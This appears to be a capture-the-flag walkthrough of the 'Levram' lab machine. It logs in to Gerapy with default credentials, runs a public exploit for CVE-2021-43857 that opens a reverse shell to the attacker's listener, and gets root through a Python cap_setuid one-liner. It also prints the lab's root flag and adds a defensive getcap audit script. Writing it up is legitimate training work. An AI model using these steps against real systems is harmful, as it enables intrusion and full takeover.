OSCP Proving Grounds – Levram Walkthrough

Introduction

Welcome to another OSCP-style walkthrough on Proving Grounds – Levram. This machine is a great practice target for web exploitation and Linux privilege escalation. In this post, I’ll guide you through the full attack path, including enumeration, exploitation, and privilege escalation.

Enumeration

Nmap Scan

Starting with an Nmap scan to identify open ports and services:

nmap -sC -sV -p- $IP --open

Results show SSH (22) and an HTTP service (8000).

Web Application – Gerapy

Visiting port 8000, we find Gerapy, a Python-based web crawler manager. Checking for default credentials, we successfully log in with:

Username: admin
Password: admin

Exploitation – Remote Code Execution (RCE)

After researching, we find Gerapy is vulnerable to CVE-2021-43857, an authenticated RCE vulnerability.

Steps to Exploit:

Copied the exploit to a local file using searchsploit.

searchsploit -m python/remote/50640.py

Ran the exploit:

python3 50640.py --target $RHOST -p 8000 -L $LHOST -P 4444

The initial exploit attempt fails (no projects found), because the exploit needs an existing project to inject its payload into.

Created a new project using the Gerapy UI.

Re-ran the exploit:

Reverse shell obtained as app!

Privilege Escalation

Enumeration for Root Access

Standard checks for SUID binaries and misconfigurations revealed nothing useful. However, checking capabilities with getcap, we found:

getcap -r / 2>/dev/null

Python3 has cap_setuid=ep, meaning it can change its own UID to 0 and therefore run commands as root.

Exploiting Python Capabilities

Using GTFOBins, we escalate to root:

/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'

🔥 Root shell obtained! 🔥

Conclusion

Key Takeaways

The Low-Hanging Fruit of Pentesting

One of the easiest wins in penetration testing is checking for default or weak credentials—and Levram was no exception. The Gerapy admin panel allowed login with admin:admin, giving instant access to a vulnerable web application. This highlights a critical security flaw: many applications ship with default logins that users forget to change. Always test common username/password combinations before diving into more complex attack vectors—you might just walk through the front door. 🚀🔑

The Power of getcap in Privilege Escalation

When looking for privilege escalation paths, capabilities (getcap) are often overlooked but can be just as powerful as SUID binaries. Linux capabilities allow binaries to execute specific privileged actions without requiring full root access. Misconfigured binaries, like Python with cap_setuid=ep, let attackers escalate privileges by spawning a root shell. Capabilities worth checking for:

cap_setuid=ep → Can change user ID (e.g., Python, Perl, or Bash).

cap_setgid=ep → Can change group ID.

cap_net_bind_service=ep → Can bind low ports (often risky on shared hosts).

cap_dac_override=ep → Bypasses file permission checks.

cap_sys_admin=ep → Equivalent to root in many cases!
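To turn the getcap finding into a repeatable audit check, here is an added Python example (not code from the original post) that parses the output of getcap -r / 2>/dev/null, flags the dangerous capabilities listed above when they are both permitted and effective, and names the fix; the sample output is constructed, and both libcap output styles are assumed.

```python
"""Flag getcap output entries that allow privilege escalation (added
example, not from the original post; sample output below is constructed)."""
import re

# Capabilities that let a local user become root or bypass DAC when set on
# a general-purpose binary such as an interpreter.
DANGEROUS = {
    "cap_setuid": "can change UID, e.g. to 0",
    "cap_setgid": "can change GID, e.g. to a privileged group",
    "cap_dac_override": "bypasses file permission checks",
    "cap_sys_admin": "equivalent to root in many cases",
}
# libcap < 2.41 prints "path = caps+ep"; newer versions print "path caps=ep".
LINE_RE = re.compile(r"^(?P<path>\S+)(?: = |\s+)(?P<caps>.+)$")
# One clause: "cap_a,cap_b=ep" or "cap_a+eip".
CLAUSE_RE = re.compile(r"^(?P<names>[a-z0-9_,]+)[=+-](?P<flags>[eip]*)$")

def parse_getcap(text):
    """Return [(path, {cap_name: flags}), ...] for each parseable line."""
    entries = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # blank or unparseable line
        caps = {}
        for clause in m.group("caps").split():
            cm = CLAUSE_RE.match(clause)
            if cm:
                for name in cm.group("names").split(","):
                    caps[name] = cm.group("flags")
        entries.append((m.group("path"), caps))
    return entries

def find_risky(text):
    """Return [(path, cap, reason), ...] for dangerous caps that are permitted
    and effective: "+p" alone must be raised by the program, "e" is live at exec."""
    findings = []
    for path, caps in parse_getcap(text):
        for name, flags in caps.items():
            if name in DANGEROUS and "e" in flags and "p" in flags:
                findings.append((path, name, DANGEROUS[name]))
    return findings

# Constructed sample of getcap output, mixing both formats.
SAMPLE = """\
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/nginx cap_net_bind_service,cap_setgid=ep
"""

if __name__ == "__main__":
    for path, cap, why in find_risky(SAMPLE):
        print(f"{path}: {cap} ({why}); fix: setcap -r {path}")
```

Run against real output with find_risky(open("getcap.txt").read()); setcap -r removes the file capability set entirely, which is the right fix for an interpreter that should never have had one.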

Final Flag:

cat /root/proof.txt

📜 Root hash: f24fb68f9534867212669703025a8f40

This box was a great OSCP-style challenge, covering web exploitation and Linux privilege escalation. Hope you found this write-up helpful! 🚀

More OSCP Walkthroughs Coming Soon!
